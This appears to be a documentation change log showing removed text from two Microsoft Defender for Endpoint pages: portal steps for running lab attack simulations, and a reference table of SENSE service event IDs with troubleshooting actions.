--- The ["Do It Yourself" attack scenarios](https://security.microsoft.com/tutorials/all)-- Threat simulators-
-You can also use [Advanced hunting](advanced-hunting-overview.md) to query data and [Threat analytics](threat-analytics.md) to view reports about emerging threats.
-
-### Do-it-yourself attack scenarios
-
-If you are looking for a pre-made simulation, you can use our ["Do It Yourself" attack scenarios](https://security.microsoft.com/tutorials/all). These scripts are safe, documented, and easy to use. These scenarios will reflect Defender for Endpoint capabilities and walk you through investigation experience.
-
-> [!NOTE]
-> The connection to the test devices is done using RDP. Make sure that your firewall settings allow RDP connections.
-
-1. Connect to your device and run an attack simulation by selecting **Connect**.
-
- :::image type="content" source="media/test-machine-table.png" alt-text="The Connect button for the test devices" lightbox="media/test-machine-table.png":::
-
- :::image type="content" source="media/remote-connection.png" alt-text="The remote desktop connection screen" lightbox="media/remote-connection.png":::
-
- For **Linux devices**: you'll need to use a local SSH client and the provided command.
-
- > [!NOTE]
- > If you don't have a copy of the password saved during the initial setup, you can reset the password by selecting **Reset password** from the menu:
- >
- > :::image type="content" source="media/reset-password-test-machine.png" alt-text="The Reset password option" lightbox="media/reset-password-test-machine.png":::
- >
- > The device will change it's state to "Executing password reset", then you'll be presented with your new password in a few minutes.
-
-2. Enter the password that was displayed during the device creation step.
-
- :::image type="content" source="media/enter-password.png" alt-text="The screen on which you enter credentials" lightbox="media/enter-password.png":::
-
-3. Run Do-it-yourself attack simulations on the device.
-
-### Threat simulator scenarios
-
-If you chose to install any of the supported threat simulators during the lab setup, you can run the built-in simulations on the evaluation lab devices.
-
-Running threat simulations using third-party platforms is a good way to evaluate Microsoft Defender for Endpoint capabilities within the confines of a lab environment.
-
-> [!NOTE]
->
-> Before you can run simulations, ensure the following requirements are met:
->
-> - Devices must be added to the evaluation lab
-> - Threat simulators must be installed in the evaluation lab
-
-1. From the portal select **Create simulation**.
-
-2. Select a threat simulator.
-
- :::image type="content" source="media/select-simulator.png" alt-text="The threat simulator selection" lightbox="media/select-simulator.png":::
-
-3. Choose a simulation or look through the simulation gallery to browse through the available simulations.
-
- You can get to the simulation gallery from:
- - The main evaluation dashboard in the **Simulations overview** tile or
- - By navigating from the navigation pane **Evaluation and tutorials** \> **Simulation & tutorials**, then select **Simulations catalog**.
-
-4. Select the devices where you'd like to run the simulation on.
-
-5. Select **Create simulation**.
-
-6. View the progress of a simulation by selecting the **Simulations** tab. View the simulation state, active alerts, and other details.
-
- :::image type="content" source="media/simulations-tab.png" alt-text="Simulations tab" lightbox="media/simulations-tab.png":::
-
-After running your simulations, we encourage you to walk through the lab progress bar and explore **Microsoft Defender for Endpoint triggered an automated investigation and remediation**. Check out the evidence collected and analyzed by the feature.
-
-Hunt for attack evidence through advanced hunting by using the rich query language and raw telemetry and check out some world-wide threats documented in Threat analytics.
-
-## Simulation gallery
-
-Microsoft Defender for Endpoint has partnered with various threat simulation platforms to give you convenient access to test the capabilities of the platform right from the within the portal.
-
-View all the available simulations by going to **Simulations and tutorials** \> **Simulations catalog** from the menu.
-
-A list of supported third-party threat simulation agents are listed, and specific types of simulations along with detailed descriptions are provided on the catalog.
-
-You can conveniently run any available simulation right from the catalog.
--
-Each simulation comes with an in-depth description of the attack scenario and references such as the MITRE attack techniques used and sample Advanced hunting queries you run.
-
-**Examples:**
---
-## Evaluation report
-
-The lab reports summarize the results of the simulations conducted on the devices.
--
-At a glance, you'll quickly be able to see:
--- Incidents that were triggered-- Generated alerts-- Assessments on exposure level-- Threat categories observed-- Detection sources-- Automated investigations-
-## Provide feedback
-
-Your feedback helps us get better in protecting your environment from advanced attacks. Share your experience and impressions from product capabilities and evaluation results.
-
-Let us know what you think, by selecting **Provide feedback**.
-
security Event Error Codes https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/event-error-codes.md
- Title: Review events and errors using Event Viewer
-description: Get descriptions and further troubleshooting steps (if necessary) for all events reported by the Microsoft Defender for Endpoint service.
------- m365-security-- tier3-- mde-ngp- Previously updated : 10/27/2023---
-# Review events and errors using Event Viewer
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-enablesiem-abovefoldlink)
-
-## View events in the Defender for Endpoint service event log
-
-You can review event IDs in the [Event Viewer](/shows/inside/event-viewer) on individual devices. This can help when, for example, a device isn't appearing in the Devices list. In this scenario, you can look for event IDs on the device and then use the table below to determine further troubleshooting steps based on the corresponding event ID.
-
-To open the Defender for Endpoint service event log:
-
-1. Select **Start** on the Windows menu, type **Event Viewer**, and press **Enter** to open the Event Viewer.
-2. In the log list, under **Log Summary**, scroll until you see **Microsoft-Windows-SENSE/Operational**. Double-click the item to
- open the log.
-
- You can also access the log by expanding **Applications and Services Logs** \> **Microsoft** \> **Windows** \> **SENSE** and select **Operational**.
-
- > [!NOTE]
- > SENSE is the internal name used to refer to the behavioral sensor that powers Microsoft Defender for Endpoint.
-
-3. Events recorded by the service appear in the log.
-
-See the following table for a list of events recorded by the service.
-
- |Event ID|Message|Description|Action|
- |||||
- |1|Microsoft Defender for Endpoint service started (Version `variable`).|Occurs during system startup, shut down, and during onboarding.|Normal operating notification; no action required.|
- |2|Microsoft Defender for Endpoint service shutdown.|Occurs when the device is shut down or offboarded.|Normal operating notification; no action required.|
- |3|Microsoft Defender for Endpoint service failed to start. Failure code: `variable`.|Service didn't start.|Review other messages to determine possible cause and troubleshooting steps.|
- |4|Microsoft Defender for Endpoint service contacted the server at `variable`.|Variable = URL of the Defender for Endpoint processing servers. <br/><br/> This URL matches that seen in the Firewall or network activity.|Normal operating notification; no action required.|
- |5|Microsoft Defender for Endpoint service failed to connect to the server at `variable`.|Variable = URL of the Defender for Endpoint processing servers. <br/><br/> The service couldn't contact the external processing servers at that URL.|Check the connection to the URL. See [Configure proxy and Internet connectivity](configure-proxy-internet.md).|
- |6|Microsoft Defender for Endpoint service isn't onboarded and no onboarding parameters were found.|The device didn't onboard correctly and isn't reporting to the portal.|Onboarding must be run before starting the service. <br/><br/> Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. <br/><br/> See [Onboard Windows client devices](configure-endpoints.md).|
- |7|Microsoft Defender for Endpoint service failed to read the onboarding parameters. Failure: `variable`.|Variable = detailed error description. The device didn't onboard correctly and isn't reporting to the portal.|Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. <br/><br/> See [Onboard Windows client devices](configure-endpoints.md).|
- |8|Microsoft Defender for Endpoint service failed to clean its configuration. Failure code: `variable`.|**During onboarding:** The service failed to clean its configuration during the onboarding. The onboarding process continues. <br/><br/> **During offboarding:** The service failed to clean its configuration during the offboarding. The offboarding process finished but the service keeps running.|**Onboarding:** No action required. <br/><br/> **Offboarding:** Reboot the system. <br/><br/> See [Onboard Windows client devices](configure-endpoints.md).|
- |9|Microsoft Defender for Endpoint service failed to change its start type. Failure code: `variable`.|**During onboarding:** The device didn't onboard correctly and isn't reporting to the portal. <br/><br/>**During offboarding:** Failed to change the service start type. The offboarding process continues. |Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. <br/><br/> See [Onboard Windows client devices](configure-endpoints.md).|
- |10|Microsoft Defender for Endpoint service failed to persist the onboarding information. Failure code: `variable`.|The device didn't onboard correctly and isn't reporting to the portal.|Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. <br/><br/> See [Onboard Windows client devices](configure-endpoints.md).|
- |11|Onboarding or reonboarding of Defender for Endpoint service completed.|The device onboarded correctly.|Normal operating notification; no action required. <br/><br/> It might take several hours for the device to appear in the portal.|
- |12|Microsoft Defender for Endpoint failed to apply the default configuration.|Service was unable to apply the default configuration.|This error should resolve after a short period of time.|
- |13|Microsoft Defender for Endpoint device ID calculated: `variable`.|Normal operating process.|Normal operating notification; no action required.|
- |15|Microsoft Defender for Endpoint can't start command channel with URL: `variable`.|Variable = URL of the Defender for Endpoint processing servers. <br/><br/> The service couldn't contact the external processing servers at that URL.|Check the connection to the URL. See [Configure proxy and Internet connectivity](configure-proxy-internet.md).|
- |17|Microsoft Defender for Endpoint service failed to change the Connected User Experiences and Telemetry service location. Failure code: `variable`.|An error occurred with the Windows telemetry service.|[Ensure the diagnostic data service is enabled](troubleshoot-onboarding.md#ensure-that-microsoft-defender-antivirus-is-not-disabled-by-a-policy)">Ensure the diagnostic data service is enabled. <br/><br/> Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. <br/><br/> See [Onboard Windows client devices](configure-endpoints.md).|
- |18|OOBE (Windows Welcome) is completed.|Service will only start after any Windows updates have finished installing.|Normal operating notification; no action required.|
- |19|OOBE (Windows Welcome) hasn't yet completed.|Service will only start after any Windows updates finish installing.|Normal operating notification; no action required. <br/><br/> If this error persists after a system restart, ensure all Windows updates have full installed.|
- |20|Can't wait for OOBE (Windows Welcome) to complete. Failure code: `variable`.|Internal error.|If this error persists after a system restart, ensure all Windows updates are installed.|
- |25|Microsoft Defender for Endpoint service failed to reset health status in the registry. Failure code: `variable`.|The device didn't onboard correctly. It reports to the portal; however, the service might not appear as registered in SCCM or the registry.|Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. <br/><br/> See [Onboard Windows client devices](configure-endpoints.md).|
- |26|Microsoft Defender for Endpoint service failed to set the onboarding status in the registry. Failure code: `variable`.|The device didn't onboard correctly. <br/><br/> It reports to the portal; however the service may not appear as registered in SCCM or the registry.|Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. <br/><br/> See [Onboard Windows client devices](configure-endpoints.md).|
- |27|Microsoft Defender for Endpoint service failed to enable SENSE aware mode in Microsoft Defender Antivirus. Onboarding process failed. Failure code: `variable`.|Normally, Microsoft Defender Antivirus enters a special passive state if another real-time antimalware product is running properly on the device, and the device is reporting to Defender for Endpoint.|Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. <br/><br/> See [Onboard Windows client devices](configure-endpoints.md). <br/><br/> Ensure real-time antimalware protection is running properly.|
- |28|Microsoft Defender for Endpoint Connected User Experiences and Telemetry service registration failed. Failure code: `variable`.|An error occurred with the Windows telemetry service.|[Ensure the diagnostic data service is enabled](troubleshoot-onboarding.md#ensure-that-microsoft-defender-antivirus-is-not-disabled-by-a-policy). <br/><br/> Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. <br/><br/> See [Onboard Windows client devices](configure-endpoints.md).|
- |29|Failed to read the offboarding parameters. Error type: %1, Error code: %2, Description: %3|This event occurs when the system can't read the offboarding parameters.|Ensure the device has Internet access, then run the entire offboarding process again. Ensure the offboarding package isn't expired.|
- |30|Microsoft Defender for Endpoint service failed to disable SENSE aware mode in Microsoft Defender Antivirus. Failure code: `variable`.|Normally, Microsoft Defender Antivirus enters a special passive state if another real-time antimalware product is running properly on the device, and the device is reporting to Defender for Endpoint.|Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. <br/><br/> See [Onboard Windows client devices](configure-endpoints.md). <br/><br/> Ensure real-time antimalware protection is running properly.|
- |31|Microsoft Defender for Endpoint Connected User Experiences and Telemetry service unregistration failed. Failure code: `variable`.|An error occurred with the Windows telemetry service during onboarding. The offboarding process continues.|[Check for errors with the Windows telemetry service](troubleshoot-onboarding.md#ensure-the-diagnostic-data-service-is-enabled).|
- |32|Microsoft Defender for Endpoint service failed to request to stop itself after offboarding process. Failure code: %1|An error occurred during offboarding.|Reboot the device.|
- |33|Microsoft Defender for Endpoint service failed to persist SENSE GUID. Failure code: `variable`.|A unique identifier is used to represent each device that is reporting to the portal. <br/><br/> If the identifier doesn't persist, the same device might appear twice in the portal.|Check registry permissions on the device to ensure the service can update the registry.|
- |34|Microsoft Defender for Endpoint service failed to add itself as a dependency on the Connected User Experiences and Telemetry service, causing onboarding process to fail. Failure code: `variable`.|An error occurred with the Windows telemetry service.|[Ensure the diagnostic data service is enabled](troubleshoot-onboarding.md#ensure-that-microsoft-defender-antivirus-is-not-disabled-by-a-policy). <br/><br/> Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. <br/><br/> See [Onboard Windows client devices](configure-endpoints.md).|
- |35| Communication quotas are updated. Disk quota in MB: `variable`, daily upload quota in MB: `variable`| Variable = disk quota in MB. |Normal operating notification; no action required.|
- |36|Microsoft Defender for Endpoint Connected User Experiences and Telemetry service registration succeeded. Completion code: `variable`.|Registering Defender for Endpoint with the Connected User Experiences and Telemetry service completed successfully.|Normal operating notification; no action required.|
- |37|Microsoft Defender for Endpoint A module is about to exceed its quota. Module: %1, Quota: {%2} {%3}, Percentage of quota utilization: %4.|The device is near its allocated quota of the current 24-hour window. It's about to be throttled.|Normal operating notification; no action required.|
- |38|Network connection is identified as low. Microsoft Defender for Endpoint contacts the server every %1 minutes. Metered connection: %2, internet available: %3, free network available: %4.|The device is using a metered/paid network and contacts the server less frequently.|Normal operating notification; no action required.|
- |39|Network connection is identified as normal. Microsoft Defender for Endpoint contacts the server every %1 minutes. Metered connection: %2, internet available: %3, free network available: %4.|The device isn't using a metered/paid connection and contacts the server as usual.|Normal operating notification; no action required.|
- |40|Battery state is identified as low. Microsoft Defender for Endpoint contacts the server every %1 minutes. Battery state: %2.|The device has low battery level and contacts the server less frequently.|Normal operating notification; no action required.|
- |41|Battery state is identified as normal. Microsoft Defender for Endpoint contacts the server every %1 minutes. Battery state: %2.|The device doesn't have low battery level and contacts the server as usual.|Normal operating notification; no action required.|
- |42|Microsoft Defender for Endpoint component failed to perform action. Component: %1, Action: %2, Exception Type: %3, Exception message: %4|Internal error. The service failed to start.|If this error persists, contact Support.|
- |43|Microsoft Defender for Endpoint component failed to perform action. Component: %1, Action: %2, Exception Type: %3, Exception Error: %4, Exception message: %5|Internal error. The service failed to start.|If this error persists, contact Support.|
- |44|Offboarding of Defender for Endpoint service completed.|The service was offboarded.|Normal operating notification; no action required.|
- |45|Failed to register and to start the event trace session [%1]. Error code: %2|An error occurred on service startup while creating ETW session. This caused service start-up failure.|If this error persists, contact Support.|
- |46|Failed to register and start the event trace session [%1] due to lack of resources. Error code: %2. This is most likely because there are too many active event trace sessions. The service retries in 1 minute.|An error occurred on service startup while creating ETW session due to lack of resources. The service is running, but doesn't report sensor events until the ETW session starts.|Normal operating notification; no action required. The service tries to start the session every minute.|
- |47|Successfully registered and started the event trace session - recovered after previous failed attempts.|This event follows the previous event after successfully starting of the ETW session.|Normal operating notification; no action required.|
- |48|Failed to add a provider [%1] to event trace session [%2]. Error code: %3. This means that events from this provider aren't reported.|Failed to add a provider to ETW session. As a result, the provider events aren't reported.|Check the error code. If the error persists contact Support.|
- |49|Invalid cloud configuration command received and ignored. Version: %1, status: %2, error code: %3, message: %4|Received an invalid configuration file from the cloud service that was ignored.|If this error persists, contact Support.|
- |50|New cloud configuration applied successfully. Version: %1.|Successfully applied a new configuration from the cloud service.|Normal operating notification; no action required.|
- |51|New cloud configuration failed to apply, version: %1. Successfully applied the last known good configuration, version %2.|Received a bad configuration file from the cloud service. Last known good configuration was applied successfully.|If this error persists, contact Support.|
- |52|New cloud configuration failed to apply, version: %1. Also failed to apply last known good configuration, version %2. Successfully applied the default configuration.|Received a bad configuration file from the cloud service. Failed to apply the last known good configuration - and the default configuration was applied.|The service will attempt to download a new configuration file within 5 minutes. If you don't see event #50 - contact Support.|
- |53|Cloud configuration loaded from persistent storage, version: %1.|The configuration was loaded from persistent storage on service startup.|Normal operating notification; no action required.|
- |54| Global (per-pattern) state changed. State: %1, pattern: %2 | If state = 0: Cyber-data reporting rule has reached its defined capping quota and doesn't send more data until the capping quota expires. If state = 1: The capping quota expired and the rule will resume sending data. | Normal operating notification; no action required. |
- |55|Failed to create the Secure ETW autologger. Failure code: %1|Failed to create the secure ETW logger.|Reboot the device. If this error persists, contact Support.|
- |56|Failed to remove the Secure ETW autologger. Failure code: %1|Failed to remove the secure ETW session on offboarding.|Contact Support.|
- |57|Capturing a snapshot of the machine for troubleshooting purposes.|An investigation package, also known as forensics package, is being collected.|Normal operating notification; no action required.|
- |59|Starting command: %1|Starting response command execution.|Normal operating notification; no action required.|
- |60|Failed to run command %1, error: %2.|Failed to execute response command.|If this error persists, contact Support.|
- |61|Data collection command parameters are invalid: SasUri: %1, compressionLevel: %2.|Failed to read or parse the data collection command arguments (invalid arguments).|If this error persists, contact Support.|
- |62|Failed to start Connected User Experiences and Telemetry service. Failure code: %1|Connected User Experiences and Telemetry (diagtrack) service failed to start. Non-Microsoft Defender for Endpoint telemetry isn't sent from this machine.|Look for more troubleshooting hints in the event log: Microsoft-Windows-UniversalTelemetryClient/Operational.|
- |63|Updating the start type of external service. Name: %1, actual start type: %2, expected start type: %3, exit code: %4|Updated start type of the external service.|Normal operating notification; no action required.|
- |64|Starting stopped external service. Name: %1, exit code: %2|Starting an external service.|Normal operating notification; no action required.|
- |65|Failed to load Microsoft Security Events Component Minifilter driver. Failure code: %1|Failed to load MsSecFlt.sys filesystem minifilter.|Reboot the device. If this error persists, contact Support.|
- |66|Policy update: Latency mode - %1|The C&C connection frequency policy was updated.|Normal operating notification; no action required.|
- |68|The start type of the service is unexpected. Service name: %1, actual start type: %2, expected start type: %3|Unexpected external service start type.|Fix the external service start type.|
- |69|The service is stopped. Service name: %1|The external service is stopped.|Start the external service.|
- |70|Policy update: Allow sample collection - %1|The sample collection policy was updated.|Normal operating notification; no action required.|
- |71|Succeeded to run command: %1|The command was executed successfully.|Normal operating notification; no action required.|
- |72|Tried to send first full machine profile report. Result code: %1|Informational only.|Normal operating notification; no action required.|
- |73|Sense starting for platform: %1|Informational only.|Normal operating notification; no action required.|
- |74|Device tag in registry exceeds length limit. Tag name: %2. Length limit: %1.|The device tag exceeds the length limit.|Use a shorter device tag.|
- |81|Failed to create Microsoft Defender for Endpoint ETW autologger. Failure code: %1|Failed to create the ETW session.|Reboot the device. If this error persists, contact Support.|
- |82|Failed to remove Microsoft Defender for Endpoint ETW autologger. Failure code: %1|Failed to delete the ETW session.|Contact Support.|
- |84|Set Microsoft Defender Antivirus running mode. Force passive mode: %1, result code: %2.|Set defender running mode (active or passive).|Normal operating notification; no action required.|
- |85|Failed to trigger Microsoft Defender for Endpoint executable. Failure code: %1|Starring SenseIR executable failed.|Reboot the device. If this error persists, contact Support.|
- |86|Starting again stopped external service that should be up. Name: %1, exit code: %2|Starting the external service again.|Normal operating notification; no action required.|
- |87|Cannot start the external service. Name: %1|Failed to start the external service.|Contact Support.|
- |88|Updating the start type of external service again. Name: %1, actual start type: %2, expected start type: %3, exit code: %4|Updated the start type of the external service.|Normal operating notification; no action required.|
- |89|Cannot update the start type of external service. Name: %1, actual start type: %2, expected start type: %3|Can't update the start type of the external service.|Contact Support.|
- |90|Failed to configure System Guard Runtime Monitor to connect to cloud service in geo-region %1. Failure code: %2|System Guard Runtime Monitor doesn't send attestation data to the cloud service.|Check the permissions on register path: "HKLM\Software\Microsoft\Windows\CurrentVersion\Sgrm". If no issues spotted, contact Support.|
- |91|Failed to remove System Guard Runtime Monitor geo-region information. Failure code: %1|System Guard Runtime Monitor doesn't send attestation data to the cloud service.|Check the permissions on register path: "HKLM\Software\Microsoft\Windows\CurrentVersion\Sgrm". If no issues spotted, contact Support.|
- |92|Stopping sending sensor cyber data quota because data quota is exceeded. Will resume sending once quota period passes. State Mask: %1|Exceed throttling limit.|Normal operating notification; no action required.|
- |93|Resuming sending sensor cyber data. State Mask: %1|Resume cyber data submission.|Normal operating notification; no action required.|
- |94|Microsoft Defender for Endpoint executable has started|The SenseCE executable has started.|Normal operating notification; no action required.|
- |95|Microsoft Defender for Endpoint executable has ended|The SenseCE executable has ended.|Normal operating notification; no action required.|
- |96|Microsoft Defender for Endpoint Init has called. Result code: %2|The SenseCE executable has called MCE initialization.|Normal operating notification; no action required.|
- |97|There are connectivity issues to the Cloud for the DLP scenario|There are network connectivity issues that affect the DLP classification flow.|Check the network connectivity.|
- |98|The connectivity to the Cloud for the DLP scenario has been restored|The connectivity to the network was restored and the DLP classification flow can continue.|Normal operating notification; no action required.|
- |99|Sense has encountered the following error while communicating with server: (%1). Result: (%2)|A communication error occurred.|Check the following events in the event log for further details.|
- |100|Microsoft Defender for Endpoint executable failed to start. Failure code: %1|The SenseCE executable has failed to start.|Reboot the device. If this error persists, contact Support.|
- |102|Microsoft Defender for Endpoint Network Detection and Response executable has started|The SenseNdr executable has started.|Normal operating notification; no action required.|
- |103|Microsoft Defender for Endpoint Network Detection and Response executable has ended|The SenseNdr executable has ended.|Normal operating notification; no action required.|
- |104|Failed to queue asynchronous driver unload. Failure code: %1.|Occurs during offboarding.|Normal operating notification; no action required.|
- |105 |Failed to wait for driver unload| Occurs during offboarding.|Normal operating notification; no action required.|
- |106 |Microsoft Defender for Endpoint service failed to start. Failure code %1 ; Failed to load MsSense DLL. Module. | Occurs during startup. | Contact support. |
- |107 | Microsoft Defender for Endpoint service failed to start. Failure code %1 ; Issue with MsSense DLL Module. | Occurs during startup. | Contact support. |
- |108 |Update phase:%1, new platform version: %2, message: %3.|Occurs during update.|Normal operating notification; no action required.|
- |109 | Update phase:%1 new platform version: %2, failure message: %3, error: %4. | Occurs during update. |Contact support. |
- |110 |Failed to remove MDEContain WFP filters. | Occurs during offboarding. | Contact support. |
- |307| Failed to update driver permissions Failure code: %1. |Occurs during onboarding. |Contact support. |
- |308 | Failed to ACL on Folder %1 Failure code: %2. |Occurs during onboarding. | Contact support. |
- |401 | Microsoft Defender for Endpoint service failed to generate key. Failure code: %1. | Failed to create crypto key.|If machine isn't reporting, contact support. Otherwise, no action required. |
- |402 |Microsoft Defender for Endpoint service failed to persist authentication state. Failure code: %1.| Failed to persist authentication state. | If a device isn't reporting, contact support. Otherwise, no action required. |
- |403|Registration of Microsoft Defender for Endpoint service completed.|Successful registration to authentication service.|Normal operating notification; no action required.|
- |404 |Microsoft Defender for Endpoint service successfully generated a key. |Successful crypto key generation. |Normal operating notification; no action required.|
- |405|Failed to communicate with authentication service. %1 request failed, hresult: %2, HTTP error code: %3. |Failed to send request to authentication service.|Normal operating notification; no action required.|
- |406|Request for %1 rejected by authentication service. Hresult: %2, error code: %3. | Request returned undesired response. |Normal operating notification; no action required. |
- |407|Microsoft Defender for Endpoint service failed to sign message (authentication). Failure code: %1. |Failed to sign request. |Normal operating notification; no action required. |
- |408|Microsoft Defender for Endpoint service failed to remove persist authentication state. State: %1, Failure code: %2. |Failed to persist authentication state. |If a device isn't reporting, contact support. Otherwise, no action required.|
- |409| Microsoft Defender for Endpoint service failed to open key. Failure code: %1. |Failed to open crypto key.|If a device isn't reporting, contact support. Otherwise, no action required.|
- |410|Registration is required as part of reonboarding of Microsoft Defender for Endpoint service. |Occurs during reonboarding. |Normal operating notification; no action required.|
- |411|Cyber telemetry upload has been suspended for Microsoft Defender for Endpoint service due to invalid/expired token.|Cyber upload temporarily suspended.|Normal operating notification; no action required.|
- |412|Cyber telemetry upload been resumed for Microsoft Defender for Endpoint service due to newly refreshed token.|Cyber upload successfully resumed.|Normal operating notification; no action required.|
- |1800| CSP: Get `Node&apos;s` Value. NodeId: (%1), TokenName: (%2). | An operation of Get is about to start. | Contact support. |
- |1801|CSP: Failed to Get `Node&apos;s` Value. NodeId: (%1), TokenName: (%2), Result: (%3). | An operation of Get has failed. |Contact support.|
- |1802| CSP: Get `Node&apos;s` Value complete. NodeId: (%1), TokenName: (%2), Result: (%3). | An operation of Get has succeeded. |Contact support. |
- |1803| CSP: Get Last Connected value complete. Result (%1), IsDefault: (%2). |Last time the device communicated with CNC. | Normal operating notification; no action required. |
- |1804| CSP: Get Org ID value complete. Result: (%1), IsDefault: (%2). |The org ID device get during onboarding. |Normal operating notification; no action required. |
- |1805|CSP: Get Sense Is Running value complete. Result: (%1). | Sense running message after onboarding. |Normal operating notification; no action required. |
- |1806| CSP: Get Onboarding State value complete. Result: (%1), IsDefault: (%2). | Get is Sense onboarded. | Normal operating notification; no action required. |
- |1807| CSP: Get Onboarding value complete. Onboarding Blob Hash: (%1), IsDefault: (%2), Onboarding State: (%3), Onboarding State IsDefault: (%4). | Get is Sense onboarded and onboarding blob hash. | Normal operating notification; no action required. |
- |1808| CSP: Get Offboarding value complete. Offboarding Blob Hash: (%1), IsDefault: (%2). |Get offboarding blob hash. | Normal operating notification; no action required. |
- |1809| CSP: Get Sample Sharing value complete. Result: (%1), IsDefault: (%2). |Get is sample upload is allowed. | Normal operating notification; no action required. |
- |1810| CSP: Onboarding process. Started. |Started onboarding flow.| Normal operating notification; no action required. |
- |1811| CSP: Onboarding process. Delete Offboarding blob complete. Result: (%1). |Deleted offboarding blob as part of onboarding flow. |Normal operating notification; no action required. |
- |1812|CSP: Onboarding process. Write Onboarding blob complete. Result: (%1). | Wrote onboarding blob to registry as part of onboarding flow. |Normal operating notification; no action required. |
- |1813| CSP: Onboarding process. The service started successfully. | Started Sense service as part of onboarding flow. |Normal operating notification; no action required. |
- |1814| CSP: Onboarding process. Pending service running state complete. Result: (%1). | Finished waiting for Sense to start as part of onboarding flow. |Normal operating notification; no action required. |
- |1815|CSP: Set Sample Sharing value complete. Previous Value: (%1), IsDefault: (%2), New Value: (%3), Result: (%4). |Set sample sharing value. |Normal operating notification; no action required. |
- |1816|CSP: Offboarding process. Delete Onboarding blob complete. Result (%1). |Deleted onboarding blob as part of offboarding flow. | Normal operating notification; no action required. |
- |1817|CSP: Offboarding process. Write Offboarding blob complete. Result (%1).|Wrote offboarding blob to registry as part of offboarding flow. |Normal operating notification; no action required. |
- |1818|CSP: Set `Node&apos;s` Value started. NodeId: (%1), TokenName: (%2). | An operation of Set is about to start. |Normal operating notification; no action required.|
- |1819|CSP: Failed to Set `Node&apos;s` Value. NodeId: (%1), TokenName: (%2), Result: (%3). | An operation of Set has failed. |Contact support. |
- |1820|CSP: Set `Node&apos;s` Value complete. NodeId: (%1), TokenName: (%2), Result: (%3). | An operation of Set has succeeded. |Normal operating notification; no action required. |
- |1821|CSP: Set Telemetry Reporting Frequency started. New value: (%1). | Start setting the value of TelemetryReportingFrequency. | Normal operating notification; no action required.|
- |1822| CSP: Set Telemetry Reporting Frequency complete. Previous value: (%1), IsDefault: (%2), New value: (%3), Result: (%4). | Finish setting the value of TelemetryReportingFrequency.| Normal operating notification; no action required. |
- |1823| CSP: Get Telemetry Reporting Frequency complete. Value: (%1), Registry Value: (%2), IsDefault: (%3). | Gets the value of TelemetryReportingFrequency.| Normal operating notification; no action required. |
- |1824| CSP: Get Group Ids complete. Value: (%1), IsDefault: (%2). |Got groupIds from registry. |Normal operating notification; no action required. |
- |1825| CSP: Set Group Ids exceeded allowed limit. Allowed: (%1), Actual: (%2). | Failed to set groupIds due to length. | Normal operating notification; no action required. |
- |1826| CSP: Set Group Ids complete. Value: (%1), Result: (%2). | Set groupIds. | Normal operating notification; no action required. |
- |1827| CSP: Onboarding process. Service is running: (%1), Previous Onboarding Blob Hash: (%2), IsDefault: (%3), Onboarding State: (%4), Onboarding State IsDefault: (%5), New Onboarding Blob Hash: (%6). | Trace values as part of onboarding. | Normal operating notification; no action required. |
- |1828| CSP: Onboarding process. Service is running: (%1), Previous Offboarding Blob Hash: (%2), IsDefault: (%3), Onboarding State: (%4), Onboarding State IsDefault: (%5), New Offboarding Blob Hash: (%6). | Trace values as part of offboarding. | Normal operating notification; no action required. |
- |1829|CSP: Failed to Set Sample Sharing Value. Requested Value: (%1), Allowed Values between (%2) and (%3). |Invalid value for SampleSharing operation. |Contact support. |
- |1830| CSP: Failed to Set Telemetry Reporting Frequency Value. Requested Value: (%1). | Setting the value of TelemetryReportingFrequency failed. | Contact support if problem persists.|
- |1831|CSP: Get Sense is running. Service is configured as delay-start, and `hasn&apos;t` started yet. |Get SenseIsRunning result. |Normal operating notification; no action required. |
- |1832| CSP: Get Device Tagging Group complete. Value: (%1), IsDefault: (%2). | Get DeviceTagging Group from registry completed. | Normal operating notification; no action required. |
- |1833| CSP: Get Device Tagging Criticality value complete. In Registry: (%1), IsDefault: (%2), Conversion Succeeded: (%3), Result: (%4). | Get DeviceTagging Criticality from registry completed. | Normal operating notification; no action required. |
- |1834| CSP: Get Device Tagging Identification Method value complete. In Registry: (%1), IsDefault: (%2), Conversion Succeeded: (%3), Result: (%4). | Get DeviceTagging Id Method from registry completed. | Normal operating notification; no action required. |
- |1835| CSP: Set Device Tagging Group complete. Value: (%1), Result: (%2). | Set DeviceTagging Group in registry completed. | Normal operating notification; no action required.|
- |1836| CSP: Set Device Tagging Group exceeded allowed limit. Allowed: (%1), Actual: (%2). | Set DeviceTagging Group failed as maximum Length Limit exceeded. |Contact support if problem persists. |
- |1837| CSP: Set Device Tagging Criticality value complete. Previous Value: (%1), IsDefault: (%2), New Value: (%3), Result: (%4). | Set DeviceTagging Criticality in registry completed. |Normal operating notification; no action required. |
- |1838| CSP: Failed to Set Device Tagging Criticality Value. Requested Value: (%1), Allowed Values between (%2) and (%3). | Set DeviceTagging Criticality failed as value was not within expected range. | Contact support if problem persists. |
- |1839| CSP: Set Device Tagging Identification Method value complete. Previous Value: (%1), IsDefault: (%2), New Value: (%3), Result: (%4). | Set DeviceTagging Id Method in registry completed. | Normal operating notification; no action required. |
- |1840| CSP: Failed to Set Device Tagging Identification Method Value. Requested Value: (%1), Allowed Values between (%2) and (%3). | Set DeviceTagging Id Method failed as value was not within expected range. | Contact support if problem persists. |
-
-## View Defender for Endpoint events in the System event log
-
